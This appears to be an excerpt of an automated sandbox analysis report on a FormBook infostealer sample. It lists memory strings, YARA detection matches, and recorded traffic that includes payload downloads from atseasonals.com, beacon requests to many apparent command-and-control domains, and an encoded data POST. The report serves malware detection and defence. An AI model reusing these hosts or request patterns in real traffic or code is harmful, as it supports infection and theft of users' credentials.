        Source: explorer.exe, 0000000E.00000000.47883732426.000000000EF08000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48068764789.000000000EF08000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47784748807.000000000EF25000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47784599668.000000000EF08000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47883880392.000000000EF25000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48068924445.000000000EF25000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47831331678.000000000EF25000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47831166569.000000000EF08000.00000004.00000001.sdmpString found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
        Source: DB1.23.drString found in binary or memory: https://login.live.com/
        Source: rundll32.exe, 0000000F.00000002.51919311329.00000000005CB000.00000004.00000020.sdmp, cmd.exe, 00000017.00000003.50652681832.0000000002C85000.00000004.00000001.sdmp, cmd.exe, 00000017.00000002.50655035814.0000000002C10000.00000004.00000001.sdmp, DB1.23.drString found in binary or memory: https://login.live.com//
        Source: cmd.exe, 00000017.00000003.50652681832.0000000002C85000.00000004.00000001.sdmp, cmd.exe, 00000017.00000002.50655035814.0000000002C10000.00000004.00000001.sdmp, DB1.23.drString found in binary or memory: https://login.live.com/https://login.live.com/
        Source: rundll32.exe, 0000000F.00000002.51919311329.00000000005CB000.00000004.00000020.sdmp, cmd.exe, 00000017.00000003.50652681832.0000000002C85000.00000004.00000001.sdmp, cmd.exe, 00000017.00000002.50655035814.0000000002C10000.00000004.00000001.sdmp, DB1.23.drString found in binary or memory: https://login.live.com/v104
        Source: explorer.exe, 0000000E.00000000.47821015918.000000000CD93000.00000004.00000001.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
        Source: explorer.exe, 0000000E.00000000.47785341838.000000000EFD3000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47884525270.000000000EFD3000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47774864959.000000000CD5E000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47820777870.000000000CD5E000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47831983966.000000000EFD3000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48057235938.000000000CD5E000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47872878262.000000000CD5E000.00000004.00000001.sdmpString found in binary or memory: https://outlook.com
        Source: explorer.exe, 0000000E.00000000.47784524251.000000000EEF9000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47883648212.000000000EEF9000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48068672624.000000000EEF9000.00000004.00000001.sdmpString found in binary or memory: https://powerpoint.office.com
        Source: explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmpString found in binary or memory: https://windows.msn.com:443/shell
        Source: explorer.exe, 0000000E.00000000.47785341838.000000000EFD3000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47884525270.000000000EFD3000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47831983966.000000000EFD3000.00000004.00000001.sdmpString found in binary or memory: https://word.office.comERM
        Source: explorer.exe, 0000000E.00000000.47823088938.000000000CF7A000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47777354065.000000000CF7A000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47877256176.000000000D231000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47779217096.000000000D231000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47804704949.000000000315A000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48062074884.000000000D231000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47875315528.000000000CF7A000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47825427484.000000000D231000.00000004.00000001.sdmp, rundll32.exe, 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, rundll32.exe, 0000000F.00000002.51929803226.00000000048A8000.00000004.00020000.sdmp, firefox.exe, 00000019.00000002.50719834239.00000000400B8000.00000004.00020000.sdmp, Zr26f1rL6r.exe, c8ahotgz8h.exe.14.drString found in binary or memory: https://www.digicert.com/CPS0
        Source: explorer.exe, 0000000E.00000000.47784524251.000000000EEF9000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47883648212.000000000EEF9000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48068672624.000000000EEF9000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp
        Source: explorer.exe, 0000000E.00000000.47784524251.000000000EEF9000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47883648212.000000000EEF9000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48068672624.000000000EEF9000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpf
        Source: explorer.exe, 0000000E.00000000.47784748807.000000000EF25000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47883880392.000000000EF25000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48068924445.000000000EF25000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47831331678.000000000EF25000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
        Source: explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
        Source: explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
        Source: explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
        Source: explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
        Source: explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
        Source: rundll32.exe, 0000000F.00000002.51930074109.0000000004A02000.00000004.00020000.sdmp, firefox.exe, 00000019.00000000.50661739455.0000000040212000.00000004.00020000.sdmpString found in binary or memory: https://www.zoho.com/sites/?src=parkeddomain&dr=www.unitedmetal-saudi.com
        Source: rundll32.exe, 0000000F.00000002.51930074109.0000000004A02000.00000004.00020000.sdmp, firefox.exe, 00000019.00000000.50661739455.0000000040212000.00000004.00020000.sdmpString found in binary or memory: https://www.zoho.com/sites/images/professionally-crafted-themes.png
        Source: unknownHTTP traffic detected: POST /n8ds/ HTTP/1.1Host: www.inklusion.onlineConnection: closeContent-Length: 131142Cache-Control: no-cacheOrigin: http://www.inklusion.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.inklusion.online/n8ds/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 36 6c 64 44 3d 33 56 45 69 59 58 53 66 54 54 54 35 52 6b 67 39 58 4c 78 76 35 4a 39 46 77 44 34 32 41 57 44 75 43 38 4d 7a 52 61 6e 69 76 71 45 6e 38 4b 6f 79 66 6b 55 4f 47 44 69 6d 58 77 77 58 48 37 58 6b 4e 59 34 6f 4e 63 6b 78 69 7a 31 68 67 70 79 4d 6d 67 6e 61 6c 30 67 69 47 4f 76 30 77 55 51 58 6c 52 4d 62 6f 79 6f 55 35 73 62 34 78 37 6a 33 75 7a 7e 75 28 53 35 6d 28 6c 69 5a 4e 39 6e 30 7a 35 32 6a 65 76 30 69 35 46 36 30 73 52 64 71 63 34 76 4a 28 77 4b 46 67 42 50 36 39 75 46 56 6a 71 39 6f 56 38 6f 50 50 5a 38 4d 58 30 72 63 4f 4e 76 31 7a 79 37 4e 38 44 34 52 6d 33 4d 4a 31 53 58 36 6e 42 39 42 36 4a 71 45 45 55 49 62 5a 72 58 6f 33 65 55 77 47 79 62 5f 69 59 31 47 6e 74 71 64 75 4b 64 31 78 75 34 57 50 57 6c 4a 6c 54 4b 4f 39 4b 73 66 6c 4e 47 54 33 67 53 64 53 44 6d 30 69 5f 4d 54 64 45 6d 68 4d 69 6f 54 31 35 79 37 45 4f 7e 66 6a 70 4e 2d 59 45 67 47 28 56 50 70 49 59 78 4e 6e 41 41 44 44 46 56 49 33 6e 61 56 37 79 70 39 58 35 46 46 35 56 66 50 76 55 39 43 4f 30 68 61 55 61 45 4c 66 33 72 5f 6c 76 45 34 61 73 48 36 78 4a 6d 70 46 6b 65 2d 4c 42 62 71 39 46 78 34 76 4c 51 34 63 42 62 64 4a 65 71 65 70 4c 52 6e 49 4b 6e 67 42 70 66 44 50 6c 73 5a 77 73 62 43 4d 31 45 31 66 63 72 5f 65 35 42 52 6a 56 41 49 7e 36 35 62 34 46 66 33 42 4c 51 7a 6b 75 4c 62 51 68 45 5f 67 50 59 65 70 73 54 47 69 76 68 32 6e 6f 57 74 32 36 53 45 6b 5a 63 49 48 4f 74 6b 63 4f 41 4b 68 62 6c 51 6e 34 64 7a 30 4a 54 51 28 38 4f 67 30 33 49 6d 66 43 4f 67 4a 73 4c 63 6e 77 4f 72 44 56 45 66 62 51 4c 72 6d 65 52 79 74 37 62 63 43 46 58 72 75 55 44 65 61 6d 59 47 66 46 64 55 32 54 6e 77 66 5a 51 64 38 32 6c 2d 36 75 47 4c 66 64 75 41 68 4c 33 65 64 71 5a 37 6c 4a 6a 47 72 6b 79 38 70 44 76 4b 50 72 49 53 70 4b 44 76 59 6c 39 6e 66 41 64 75 32 51 44 55 62 31 39 31 31 6a 65 78 73 66 7e 46 61 54 64 79 74 41 6f 30 6f 70 28 54 55 53 36 56 53 56 50 44 70 75 28 4b 6e 36 52 57 42 63 46 30 35 36 62 61 49 4f 6a 6d 6b 43 30 75 33 54 5a 33 59 41 61 35 49 45 51 7a 75 64 69 64 31 37 62 37 44 50 7e 45 31 46 4c 30 43 37 4e 6a 65 42 4d 66 55 39 4f 4d 55 36 58 58 79 49 33 33 58 34 4c 4d 72 53 70 6b 78 53 34 2d 67 32 37 49 4b 71 65 79 6b 5a 6f 56 4c 56 66 67 4a 79 6e 77 30 56 71 44 32 4f 67 75 7e 41 59 6c 57 7a 39 42 47 53 53 71 61 2d 70 53 6c 44 34 71 43 6e 52 6b 62 77 31 63 57 6b 54 41 30 6f 4a 43 57 6f 63 31 49 73 31 50 4e 4b 4c 4f 46 4e 47 30 43 6b 4a 6d 37 52 79 66 71 62 6f 52 7a 6d 62 72 46 36 4a 75 65 68 32 58 74 65 48 38 70 6f 73 35 36 37 55 37 54 71 57 64 71 66 62 46 78 4a 62 56 4a 51 38 32 51 72 52 6b 4f 43 70 49 5a 45 57 6a 4b 58 43 32 5a 73 4d 53 35 77 34 56 57
        Source: unknownDNS traffic detected: queries for: atseasonals.com
        Source: global trafficHTTP traffic detected: GET /GHrtt/bin_kbJoepxz175.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: atseasonals.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /GHrtt/bin_kbJoepxz175.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: atseasonals.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /GHrtt/bin_kbJoepxz175.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: atseasonals.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /GHrtt/bin_kbJoepxz175.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: atseasonals.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=WOFmZk82z8UpNC4mY/AvD/Zy3C9NxlTUz/ym6JpmI0LbMg439xvRHQoxZAlOCyCIZ92f&v6Mt=3fxxA4Z HTTP/1.1Host: www.topwowshopping.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&v6Mt=3fxxA4Z HTTP/1.1Host: www.growebox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4&v6Mt=3fxxA4Z HTTP/1.1Host: www.ayudavida.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=QiVr4NomMTfDVQzLAZiPy17hhsXauZOjQhEkIhfcDYRSe01pzyB5iClqESLJZee3iuRd&v6Mt=3fxxA4Z HTTP/1.1Host: www.stylesbykee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z HTTP/1.1Host: www.inklusion.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1Host: www.mackthetruck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl&5jp=eZ4Pez HTTP/1.1Host: www.helpcloud.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=n1UrTr6j/bQFz4e4Cp8BbMP0v/KiHdXZ9JkrSrs2y278xAws0T3fM8y5E13MJVyQk50j&5jp=eZ4Pez HTTP/1.1Host: www.ozattaos.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&5jp=eZ4Pez HTTP/1.1Host: www.inklusion.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=diws0RRfDxwvVlRuoC4BJCkr8rc2YRL+Z6kcdn/HANybL0ntvNIGnh8uTRYHcPOHwusF&5jp=eZ4Pez HTTP/1.1Host: www.unitedmetal-saudi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z HTTP/1.1Host: www.inklusion.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1Host: www.mackthetruck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?2dfPiT=o6P8yX&6ldD=xlQ0Win+OWEEdOu7BqbL/FEFl5i/i6MXL9UXMpB5xFgkztpNPhPNR2/8wQo9B3jWcPv9 HTTP/1.1Host: www.divorcefearfreedom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=BkWPMdYTTR0ZQmtbwmm8ayu+d1W65DpSRIKYH6pwPIESNdIBtEF9Jb3WD/+idhQ1krue&2dfPiT=o6P8yX HTTP/1.1Host: www.jamiecongedo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&v6Mt=3fxxA4Z HTTP/1.1Host: www.lopsrental.leaseConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z HTTP/1.1Host: www.inklusion.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1Host: www.mackthetruck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: unknownHTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49812 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49837 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49840 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49841 version: TLS 1.2

        E-Banking Fraud:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 00000019.00000000.50661482100.0000000040097000.00000004.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
        Source: 00000019.00000002.50719644805.0000000040097000.00000004.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
        Source: 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
        Source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000019.00000000.50714091090.0000000040097000.00000004.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
        Source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000F.00000002.51929622698.0000000004887000.00000004.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
        Source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: Zr26f1rL6r.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: 00000019.00000000.50661482100.0000000040097000.00000004.00020000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000019.00000002.50719644805.0000000040097000.00000004.00020000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000019.00000000.50714091090.0000000040097000.00000004.00020000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
